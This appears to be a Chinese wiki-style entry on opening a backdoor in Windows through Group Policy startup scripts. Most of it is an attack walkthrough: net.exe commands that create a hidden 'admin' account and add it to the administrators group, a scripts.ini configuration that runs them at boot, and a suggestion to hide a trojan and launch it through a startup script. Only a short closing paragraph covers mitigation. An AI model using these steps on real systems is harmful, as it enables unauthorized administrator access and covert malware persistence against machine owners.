開啟後門

1、組策略啟動腳本
利用過程:啟動組策略(運行->gpedit.msc->計算機配置->Windows 設定->腳本(啟動/關機) )
2、啟動與關機相關設定
選擇啟動->屬性->添加,會彈出選擇腳本名。選擇程式 C:\windows\System32\net.exe,參數 useradmin /add 來執行 net user admin /add。再同樣添加C:\Windows\system32\net.exelocalgroup administrators admin /add來執行 net localgroup administratorsadmin /add。
費話少說: 再經過進一步了解的時候發現這裡是由C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini(PS:默認是隱藏的。)來控制 shutdown 和 Startup 的。
ini組成方式如下:
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] \\代表是啟動
0CmdLine=C:\WINDOWS\system32\net.exe \\腳本名
0Parameters=user admin /add \\腳本參數
1CmdLine=C:\WINDOWS\system32\net.exe \\第二條腳本名
1Parameters=localgroup administrators admin /add \\第二條腳本參數
[Shutdown] \\關閉
0CmdLine=1.bat \\腳本名 1.bat 目錄隊應於
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\參數
也就是說 scripts.ini 控制著整個啟動,就如同以前 win.ini 一樣。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 啟動檔案的目錄,那樣腳本名路徑就可以不用加詳細目錄名了。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 關閉檔案目錄,同上。
思路就這樣,copy 後門到非常隱藏的目錄,再加個啟動腳本參數,實現木馬啟動。
解決此缺陷的方法:組策略->計算機配置->管理模板->系統->腳本,相應的禁止就行了。
或者來招毒的,徹底禁止掉這個:把scripts.ini 對套用戶許可權全部刪除,system administrators 全部取消,就沒人能訪問了。
以上在 Windows XP SP2 均已測試成功。

相關詞條

相關搜尋

熱門詞條

聯絡我們